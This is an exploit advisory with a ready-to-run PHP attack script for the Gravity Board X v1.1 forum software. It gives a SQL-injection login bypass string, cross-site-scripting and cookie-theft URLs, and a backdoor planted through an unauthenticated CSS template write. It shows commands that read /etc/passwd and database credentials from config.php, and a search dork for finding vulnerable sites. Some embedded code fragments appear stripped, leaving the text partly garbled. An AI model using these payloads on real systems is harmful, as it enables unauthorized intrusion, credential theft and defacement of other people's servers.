4.22 07/08/2005 Gravity Board X v1.1 (possibly prior versions) Remote code execution, SQL Injection / Login Bypass, cross site scripting, path disclosure poc software: author site: http://www.gravityboardx.com/ a) Sql Injection / Login Bypass: A user can bypass login check and grant administrator privileges on target system: login: ' or isnull(1/0) /* password: whatever b) Cross site scripting poc: b.1)After he login as administrator he can edit template to insert evil javascript code. Try to insert at the end of the template these lines: b.2)A user can craft a malicious url like this to access target user cookies: http://[target]/[path]/deletethread.php?board_id="> c) Remote commands/php code execution: c.1) Editing the template, attacker can leave a backdoor in target system, example, at the end of template: After, the attacker can launch commands by this urls: http://[target]/[path]/index.php?cmd=ls%20-la to list directories... http://[target]/[path]/index.php?cmd=cat%20/etc/passwd to see Unix /etc/passwd file http://[target]/[path]/index.php?cmd=cat%20config.php to see database username/password c.2) An IMPORTANT NOTE: You can edit template without to be logged in as administator, calling editcss.php script, look at the code of this script: if($fp = fopen('gbxfinal.css','w')){ fwrite($fp, $csscontent); fclose($fp); echo ''; }else{ echo 'Gravity Board X was unable to save changes to the CSS template.'; } a user can easily deface the forum and/or insert a backdoor calling an url like this: http://[target]/[path]/editcss.php?csscontent= then execute commands: http://[target]/[path]/index?cmd=[command] this my php exploit code, run it from Apache: Gravity Board X v1.1 remote commands execution

Gravity Board X v1.1 (possibly prior versions) remote commands execution

a script by rgod at http://rgod.altervista.org

hostname (ex: www.sitename.com)

path (ex: /flatnuke/forum/ or /forum/ just /)

specify a port other than 80 (default value)

a Unix command, example: ls -la to list directories, cat /etc/passwd to show passwd file

send exploit through an HTTP proxy (ip:port)

'; function show($headeri) { $ii=0; $ji=0; $ki=0; $ci=0; echo ''; while ($ii <= strlen($headeri)-1) { $htmli=dechex(ord($headeri[$ii])); if ($ji==16) { $ji=0; $ci++; echo ""; for ($li=0; $li<=15; $li++) { echo ""; } $ki=$ki+16; echo ""; } if (strlen($htmli)==1) {echo "";} else {echo " ";} $ii++; $ji++; } for ($li=1; $li<=(16 - (strlen($headeri) % 16)+1); $li++) { echo ""; } for ($li=$ci*16; $li<=strlen($headeri); $li++) { echo ""; } echo "
  ".$headeri[$li+$ki]."
0".$htmli."".$htmli."  ".$headeri[$li]."
"; } $proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)'; if ($proxy<>'') { $c = preg_match_all($proxy_regex,$proxy,$is_proxy); if ($c==0) { echo 'check the proxy...
'; die; } } if (($path<>'') and ($host<>'') and ($command<>'')) { //Gravity forum default template $template='A:link, A:visited, A:active { TEXT-DECORATION: none; COLOR: #E6B400; } A:hover { TEXT-DECORATION: underline; } p { FONT-FAMILY: Verdana, Arial, Sans-Serif; FONT-SIZE: 12px; COLOR: #FFFFFF; BACKGROUND: transparent; } body { FONT-FAMILY: Verdana, Arial, Sans-Serif; FONT-SIZE: 12px; COLOR: #FFFFFF; BACKGROUND: #101010; } /* FONTS */ .headerfont { FONT-FAMILY: Verdana; FONT-SIZE: 9pt; FONT-WEIGHT: bold; COLOR: #DCDCDC; } .headerfont2 { FONT-FAMILY: Verdana; FONT-SIZE: 9pt; FONT-WEIGHT: bold; COLOR: #FFFFFF; } .categoryfont { FONT-FAMILY: Verdana; FONT-SIZE: 12px; FONT-WEIGHT: bold; COLOR: #FFFFFF; } .mainlinkfont { FONT-FAMILY: Verdana; FONT-SIZE: 12px; FONT-WEIGHT: bold; COLOR: #006699; } .navfont { FONT-FAMILY: Arial; FONT-SIZE: 8pt; FONT-WEIGHT: bold; COLOR: #000000; } .navheader { FONT-FAMILY: Tahoma; FONT-SIZE: 14pt; FONT-WEIGHT: bold; COLOR: #000000; } .profilefont { FONT-FAMILY: Verdana, Arial, Sans-Serif; FONT-SIZE: 12px; } .small { FONT-FAMILY: Verdana; FONT-SIZE: 10px; } .subjectfont { FONT-FAMILY: Verdana; FONT-SIZE: 11px; COLOR: #006699; } .welcomefont { FONT-FAMILY: Verdana; FONT-SIZE: 12px; FONT-WEIGHT: bold; COLOR: #FFFFFF; } /* MAIN TABLES */ .station { BORDER-WIDTH: 1px; BORDER-STYLE: solid; BORDER-COLOR: #505050; CELL-SPACING: 1px; PADDING: 4; BACKGROUND: #222222; } .main { BORDER-WIDTH: 1px; BORDER-STYLE: solid; BORDER-COLOR: #505050; CELL-SPACING: 1px; PADDING: 4; BACKGROUND: #181818; } .post { BORDER-WIDTH: 1px; BORDER-STYLE: solid; BORDER-COLOR: #505050; CELL-SPACING: 0px; BACKGROUND: #202020; BORDER-COLLAPSE: collapse; } /* OTHER */ .textbox { COLOR: #FFFFFF; background: #606060; border: 1px inset #C0C0C0; font-size: 8pt; FONT-FAMILY: Verdana; } .button { COLOR: #FFFFFF; BACKGROUND: #707070; FONT-FAMILY: Verdana; FONT-WEIGHT: bold; BORDER-STYLE: solid; BORDER-COLOR: #999999; BORDER-WIDTH: 2px; } /* TABLE CELLS */ .header { BACKGROUND-IMAGE: url(images/skin/header_dark.gif); } .row1 { BACKGROUND: #303030; PADDING: 4px; } .row2 { BACKGROUND: #202020; PADDING: 4px; } .row3 { BACKGROUND: #404040; PADDING: 4px; } .floatrow { BACKGROUND: #4A4A4A; PADDING: 4px; } .rollover { BACKGROUND: #808080; PADDING: 4px; CURSOR: hand; }'; //setup new template if ($port=='') {$port=80;} $packet="GET "; if ($proxy<>'') {$packet.="http://".$host;} $packet.= $path."editcss.php?csscontent=".urlencode($template); //cut next line to reset template... $packet.= urlencode(""); $packet.=" HTTP/1.0\r\n"; $packet.="Accept: */*\r\n"; $packet.="Accept-Encoding: text/plain\r\n"; $packet.="Host: ".$host."\r\n\r\n"; $packet.="Connection: Close\r\n\r\n"; if ($proxy=='') {$ock=fsockopen(gethostbyname($host),$port);} else {$parts=explode(':',$proxy); echo 'Connecting to '.$parts[0].':'.$parts[1].' proxy...
'; $ock=fsockopen($parts[0],$parts[1]); if (!$ock) { echo 'No response from proxy...'; die; } } if (!$ock) {echo 'Not connected to target...'; die;} //debugging... show($packet); fputs($ock,$packet); fclose($ock); $packet="GET "; if ($proxy<>'') {$packet.="http://".$host;} $packet.=$path."index.php?cmd=".urlencode($command)." HTTP/1.0\r\n"; $packet.="Accept: */*\r\n"; $packet.="Accept-Encoding: text/plain\r\n"; $packet.="Host: ".$host."\r\n\r\n"; $packet.="Connection: Close\r\n\r\n"; if ($proxy=='') {$ock=fsockopen(gethostbyname($host),$port);} else {$parts=explode(':',$proxy); echo 'Connecting to '.$parts[0].':'.$parts[1].' proxy...
'; $ock=fsockopen($parts[0],$parts[1]); if (!$ock) { echo 'No response from proxy...'; die; } } if (!$ock) {echo 'Not connected to target...'; die;} //debugging... show($packet); fputs($ock,$packet); $html=''; while (!feof($ock)) { $html.=fgets($ock); } fclose($ock); echo "If Gravity Forum is unpatched and vulnerable, now you will see ".htmlentities($command)." output inside html...
"; echo nl2br(htmlentities($html)); } ?> It's also possible to disclose path: d) path disclosure: http://[target]/[path]/deletethread.php?perm=1 http://[target]/[path]/ban.php http://[target]/[path]/addnews.php http://[target]/[path]/banned.php http://[target]/[path]/boardstats.php http://[target]/[path]/adminform.php http://[target]/[path]/forms/admininfo.php http://[target]/[path]/forms/announcements.php http://[target]/[path]/forms/banform.php ans so on...calling scripts in /forms directory googledork: "Powered by Gravity Board" rgod site: http://rgod.altervista.org mail: retrogod at aliceposta it original advisory: http://www.rgod.altervista.org/gravity.html